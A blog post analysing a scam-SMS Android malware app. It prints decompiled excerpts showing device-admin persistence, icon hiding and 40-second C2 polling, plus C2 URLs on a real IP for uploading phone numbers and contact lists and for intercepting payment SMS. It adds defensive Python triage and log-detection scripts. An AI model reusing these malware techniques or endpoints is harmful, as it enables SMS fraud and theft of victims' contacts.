
Archive for June 8th, 2014

Dissecting a scam-SMS app

Lately I too have been getting the "Civil damages lawsuit notice (Taipei District Court)" scam SMS.


I was curious how these apps actually work. First:

1. The redirect link in the SMS leads to an .apk hosted on Dropbox

In theory, tapping it on a phone shouldn't download the file outright... and even if it does download, it shouldn't install itself.

And even if it is installed, the install screen shows an odd permission list... "send SMS messages" <- any app asking for that permission should basically be treated with suspicion.

So why do people still get infected?

2. Decompile the code and see what's interesting

https://github.com/cwchiu/sms_virus/

a) Permissions – AndroidManifest.xml

android.permission.READ_PHONE_STATE
android.permission.SEND_SMS
android.permission.READ_SMS
android.permission.WRITE_SMS
android.permission.RECEIVE_SMS
android.permission.INTERNET
android.permission.READ_CONTACTS
android.permission.RECEIVE_BOOT_COMPLETED

So SMS is completely under its control: it can send, read, write and intercept messages....

The contact list is harvested too, which means your friends may get the same scam SMS "from you".

The contact list is also exfiltrated over the network (INTERNET).

And RECEIVE_BOOT_COMPLETED lets it restart itself in the background every time Android boots...
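As an added example (not the author's code or anything taken from the APK), here is the check I would run on the decoded manifest before reading a single line of Java: parse the <uses-permission> entries and flag the combinations that matter. The manifest below is constructed from the permission list above plus the device-admin receiver named in b.2); the rule names and the benign comparison manifest are my own.

```python
"""Added triage helper: flags dangerous permission combinations in a decoded
AndroidManifest.xml (e.g. apktool output). Not part of the sample; both
manifests below are constructed."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest modelled on section a) and the device-admin receiver from b.2).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.google.service">
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <application android:label="Google Service">
        <receiver android:name="com.example.google.service.MyDeviceAdminReceiver"
                  android:permission="android.permission.BIND_DEVICE_ADMIN">
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
"""

# A harmless manifest for comparison (also constructed).
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
    <uses-permission android:name="android.permission.INTERNET"/>
</manifest>
"""

# (finding, permissions that must all be present, what the combination lets the app do)
RULES = [
    ("sms_takeover",
     {"android.permission.SEND_SMS", "android.permission.READ_SMS", "android.permission.RECEIVE_SMS"},
     "send, read and intercept SMS (premium-rate fraud, OTP theft)"),
    ("contact_spam",
     {"android.permission.READ_CONTACTS", "android.permission.SEND_SMS"},
     "text the victim's contacts to spread itself"),
    ("contact_exfil",
     {"android.permission.READ_CONTACTS", "android.permission.INTERNET"},
     "upload the address book"),
    ("boot_persistence",
     {"android.permission.RECEIVE_BOOT_COMPLETED"},
     "restart in the background after every reboot"),
]


def permissions(manifest_xml):
    """Return the set of <uses-permission android:name=...> values."""
    root = ET.fromstring(manifest_xml)
    return {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}


def device_admin_receivers(manifest_xml):
    """Receivers guarded by BIND_DEVICE_ADMIN: the components an app can hand to
    ACTION_ADD_DEVICE_ADMIN (see b.2) to make itself hard to uninstall."""
    root = ET.fromstring(manifest_xml)
    return [r.get(ANDROID_NS + "name") for r in root.iter("receiver")
            if r.get(ANDROID_NS + "permission") == "android.permission.BIND_DEVICE_ADMIN"]


def triage(manifest_xml):
    """Summarise a manifest: package, permissions, matched rules, device-admin receivers."""
    root = ET.fromstring(manifest_xml)
    perms = permissions(manifest_xml)
    return {
        "package": root.get("package"),
        "permissions": sorted(p for p in perms if p),
        "findings": [(name, why) for name, needed, why in RULES if needed <= perms],
        "device_admin": device_admin_receivers(manifest_xml),
    }


if __name__ == "__main__":
    for label, xml in (("sample", SAMPLE_MANIFEST), ("benign", BENIGN_MANIFEST)):
        report = triage(xml)
        print(f"{label}: {report['package']} device_admin={report['device_admin']}")
        for name, why in report["findings"]:
            print(f"  [{name}] {why}")
```

Run it against `apktool d sample.apk` output by reading the decoded AndroidManifest.xml into `triage()`; the constructed sample trips all four rules and exposes the device-admin receiver, the benign one trips none.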

b) Activity entry point: com.example.google.service.MainActivity (the package name is chosen to look like a Google component)

b.1) Starts the com.example.google.service.Services service

 private void StartService()
  {
    Intent localIntent = new Intent();
    localIntent.setAction("com.example.google.service.Services");
    getApplicationContext().startService(localIntent);
  }

b.2) Requests device administrator rights (once granted, the app cannot be uninstalled until the admin is deactivated in Settings)

private void addAdviceAdmin()
  {
    // DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN / EXTRA_DEVICE_ADMIN, inlined by the decompiler
    Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
    localIntent.putExtra("android.app.extra.DEVICE_ADMIN", new ComponentName("com.example.google.service", "com.example.google.service.MyDeviceAdminReceiver"));
    startActivity(localIntent);
  }

b.3) Hides the app icon

private void HideIcon()
  {
    // 2 = PackageManager.COMPONENT_ENABLED_STATE_DISABLED, 1 = PackageManager.DONT_KILL_APP:
    // disables this launcher activity so the icon disappears while the package and its service keep running
    getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
    setResult(1);
  }

c) The service, com.example.google.service.Services

c.1) Calls Repeater.sendUpdateBroadcastRepeat(this);

c.2) Repeater::sendUpdateBroadcastRepeat uses AlarmManager to fire TaskRequest on a fixed schedule

public class Repeater
{
  public static void sendUpdateBroadcastRepeat(Context paramContext)
  {
    PendingIntent localPendingIntent = PendingIntent.getBroadcast(paramContext, 0, new Intent(paramContext, TaskRequest.class), 0);
    long l = SystemClock.elapsedRealtime();
    // 2 = AlarmManager.ELAPSED_REALTIME_WAKEUP: wakes the device and broadcasts to TaskRequest every 40000 ms
    ((AlarmManager)paramContext.getSystemService("alarm")).setRepeating(2, l, 40000L, localPendingIntent);
  }
}

c.3) TaskRequest::onReceive collects the phone number, model and SDK version

  public void onReceive(Context paramContext, Intent paramIntent)
  {
    this._Context = paramContext;
    if (this._Phone == null)
    {
      // phone number (this is what READ_PHONE_STATE is for); model and SDK level are sent as "MODEL;SDK_INT"
      this._Phone = Tools.getPhoneNumber(this._Context);
      this._Model = Build.MODEL;
      this._Model = (this._Model + ";" + Build.VERSION.SDK_INT);
    }
    this._Caller = new WebServiceCalling(paramContext);
    SendRequest();
  }

c.4) TaskRequest::SendRequest

this._Caller.Request(this.taskHandler, this._Phone, this._Model);

c.5) WebServiceCalling::Request(Handler paramHandler, String paramString1, String paramString2) – more on WebServiceCalling below

// this.urlRoot is the URL defined in strings.xml; the reply is delivered to paramHandler with what = 100
callWSSub(paramHandler, 100, this.urlRoot + "SMSHandler1.ashx?t=request&p=" + Uri.encode(paramString1) + "&m=" + Uri.encode(paramString2));

c.6) HttpHelper::callWS(String paramString)

// Plain HTTP GET (no TLS): returns the response body on a 200, "" otherwise, and swallows every exception
String callWS(String paramString)
{
  HttpGet localHttpGet = new HttpGet(paramString);
  try
  {
    HttpResponse localHttpResponse = new DefaultHttpClient().execute(localHttpGet);
    String result = "";
    if (localHttpResponse.getStatusLine().getStatusCode() == 200)
    {
      result = EntityUtils.toString(localHttpResponse.getEntity());
    }
    return result;
  }
  catch (Exception localException)
  {
  }
  return "";
}

c.7) TaskRequest::taskHandler::handleMessage – dispatches on the code passed to callWSSub (100 = Request, 0 = Send, 3 = SendToContacts)

  Handler taskHandler = new Handler()
  {
    public void handleMessage(Message paramAnonymousMessage)
    {
      switch (paramAnonymousMessage.what)
      {
      case 100:
        // reply to t=request: ProcessTasks sends out the phone number
        // http://141.105.65.113/sms/SMSHandler.ashx?t=s&p=<phone number>
        TaskRequest.this.ProcessTasks(paramAnonymousMessage);
        return;
      case 0:
        // reply to t=s: send SMS
        new SMSSender(TaskRequest.this._Context).SendSMS(paramAnonymousMessage);
        return;
      case 2:
        // dump the whole address book through WebServiceCalling::SendContacts
        // http://141.105.65.113/sms/SMSHandler1.ashx?t=c&p=<phone number>&n=<contact data>
        new Contacts(TaskRequest.this._Context).ForwardContacts();
        return;
      case 3:
      default:
        // reply to t=stc is ignored here
        return;
      }
    }
  };


d) WebServiceCalling class – the C2 web service

Every call is a plain HTTP GET to this.urlRoot (http://141.105.65.113/sms/ from strings.xml); the t= parameter selects the action and, in the calls traced above, p= is the phone number.

// http://141.105.65.113/sms/SMSHandler.ashx?t=c&p=xxx&n=yyy
  public void ForwardContacts(Handler paramHandler, String paramString1, String paramString2)
    throws ParserConfigurationException, UnsupportedEncodingException
  {
    callWSSub(this.urlRoot + "SMSHandler.ashx?t=c&p=" + Uri.encode(paramString1) + "&n=" + Uri.encode(paramString2));
  }
// http://141.105.65.113/sms/SMSHandler1.ashx?t=l&p=ppp&c=ccc&ty=ooo&l=uuu
  public void Log(String paramString1, String paramString2, String paramString3, String paramString4)
  {
    callWSSub(this.urlRoot + "SMSHandler1.ashx?t=l&p=" + Uri.encode(paramString3) + "&c=" + paramString1 + "&ty=" + paramString2 + "&l=" + Uri.encode(paramString4));
  }
// http://141.105.65.113/sms/SMSHandler1.ashx?t=new
  public void NEWURL()
  {
    String str = this.urlRoot + "SMSHandler1.ashx?t=new";
    System.out.print(str); // leftover debug output
    callWSSub(this.Handler_NewUrl, str);
  }
// http://141.105.65.113/sms/SMSHandler1.ashx?t=request&p=xxxx&m=yyy
  public void Request(Handler paramHandler, String paramString1, String paramString2)
  {
    callWSSub(paramHandler, 100, this.urlRoot + "SMSHandler1.ashx?t=request&p=" + Uri.encode(paramString1) + "&m=" + Uri.encode(paramString2));
  }
// http://141.105.65.113/sms/SMSHandler.ashx?t=s&p=xxx
  public void Send(Handler paramHandler, String paramString)
    throws ParserConfigurationException, UnsupportedEncodingException
  {
    callWSSub(paramHandler, 0, this.urlRoot + "SMSHandler.ashx?t=s&p=" + Uri.encode(paramString));
  }
// http://141.105.65.113/sms/SMSHandler1.ashx?t=c&p=xxx&n=yyy
  public void SendContacts(String paramString1, String paramString2)
  {
    callWSSub(this.urlRoot + "SMSHandler1.ashx?t=c&p=" + Uri.encode(paramString1) + "&n=" + Uri.encode(paramString2));
  }
// http://141.105.65.113/sms/SMSHandler.ashx?t=stc&p=xxx
  public void SendToContacts(Handler paramHandler, String paramString)
    throws ParserConfigurationException, UnsupportedEncodingException
  {
    callWSSub(paramHandler, 3, this.urlRoot + "SMSHandler.ashx?t=stc&p=" + Uri.encode(paramString));
  }
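The endpoint table in d) and the 40-second alarm in c.2) together give a usable network signature. As an added example (not code from the post or from the sample), the script below classifies proxy-log requests against those handler/t= pairs and flags a client whose task polls recur at roughly 40 s. The log format and every log line are constructed; the host is the one from strings.xml, while the phone number, model string and contact data are made up.

```python
"""Added detection helper: classifies proxy-log requests against the C2 endpoints
listed in d) and flags the 40-second task polling set up in c.2). Not part of the
sample; the log lines are constructed."""
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# (handler, t=) -> what the request does, taken from WebServiceCalling above.
ACTIONS = {
    ("SMSHandler1.ashx", "request"): "poll for tasks (phone number + model;SDK)",
    ("SMSHandler.ashx", "s"): "fetch SMS to send",
    ("SMSHandler.ashx", "stc"): "fetch SMS to send to contacts",
    ("SMSHandler.ashx", "c"): "upload contact list",
    ("SMSHandler1.ashx", "c"): "upload contact list",
    ("SMSHandler1.ashx", "l"): "log upload (c, ty, l fields)",
    ("SMSHandler1.ashx", "new"): "fetch new C2 URL",
}

# Constructed proxy log: "<ISO timestamp> <client> <method> <url>". The C2 host is the
# one from strings.xml; phone number, model and contact data are made up.
SAMPLE_LOG = """\
2014-06-08T10:00:00 10.0.0.5 GET http://141.105.65.113/sms/SMSHandler1.ashx?t=request&p=%2B886912345678&m=GT-I9300%3B16
2014-06-08T10:00:01 10.0.0.5 GET http://141.105.65.113/sms/SMSHandler.ashx?t=s&p=%2B886912345678
2014-06-08T10:00:40 10.0.0.5 GET http://141.105.65.113/sms/SMSHandler1.ashx?t=request&p=%2B886912345678&m=GT-I9300%3B16
2014-06-08T10:01:20 10.0.0.5 GET http://141.105.65.113/sms/SMSHandler1.ashx?t=request&p=%2B886912345678&m=GT-I9300%3B16
2014-06-08T10:01:21 10.0.0.5 GET http://141.105.65.113/sms/SMSHandler1.ashx?t=c&p=%2B886912345678&n=Alice%3A0911222333%7CBob%3A0922333444
2014-06-08T10:01:30 10.0.0.5 GET http://www.example.com/index.html
2014-06-08T10:02:00 10.0.0.5 GET http://141.105.65.113/sms/SMSHandler1.ashx?t=request&p=%2B886912345678&m=GT-I9300%3B16
"""


def classify(url):
    """Match a URL against the known handler/t= pairs; None if it is not C2 traffic."""
    parts = urlsplit(url)
    handler = parts.path.rsplit("/", 1)[-1]
    query = parse_qs(parts.query)
    t = query.get("t", [None])[0]
    action = ACTIONS.get((handler, t))
    if action is None:
        return None
    # parse_qs already URL-decodes the Uri.encode()d values
    return {"handler": handler, "t": t, "action": action,
            "params": {k: v[0] for k, v in query.items()}}


def parse_log(text):
    """Turn the constructed log format into a list of classified C2 events."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url = line.split()
        hit = classify(url)
        if hit is not None:
            hit["ts"] = datetime.fromisoformat(ts)
            hit["client"] = client
            events.append(hit)
    return events


def poll_intervals(events):
    """Seconds between consecutive t=request polls."""
    polls = sorted(e["ts"] for e in events if e["t"] == "request")
    return [int((b - a).total_seconds()) for a, b in zip(polls, polls[1:])]


def is_beaconing(events, period=40, tolerance=5, min_hits=3):
    """Repeater.sendUpdateBroadcastRepeat fires every 40000 ms, so the task poll should
    recur at about 40 s. tolerance absorbs alarm and network jitter; min_hits avoids
    flagging two coincidental requests."""
    hits = sum(1 for d in poll_intervals(events) if abs(d - period) <= tolerance)
    return hits >= min_hits


def uploaded_contacts(events):
    """Decoded n= payloads of t=c requests: what actually left the phone."""
    return [e["params"]["n"] for e in events if e["t"] == "c" and "n" in e["params"]]


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    for e in evts:
        print(e["ts"].time(), e["client"], e["handler"], e["t"], "->", e["action"])
    print("poll intervals:", poll_intervals(evts), "beaconing:", is_beaconing(evts))
    print("contacts uploaded:", uploaded_contacts(evts))
```

Matching on handler name plus t= rather than on the IP is deliberate: t=new exists precisely so the server can move the app to a new urlRoot, so a host-based block alone will not hold.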

e) SMSReceiver – SMS interception

e.1) Checks whether the sender is one of the hard-coded numbers/IDs 6279,1232111,mopay,boku,66245,bezahlcode,holyo,55498,55496,33235,46645 (several of these, e.g. mopay, boku and bezahlcode, are mobile-payment senders)

e.2) If so, calls WebServiceCalling::Forward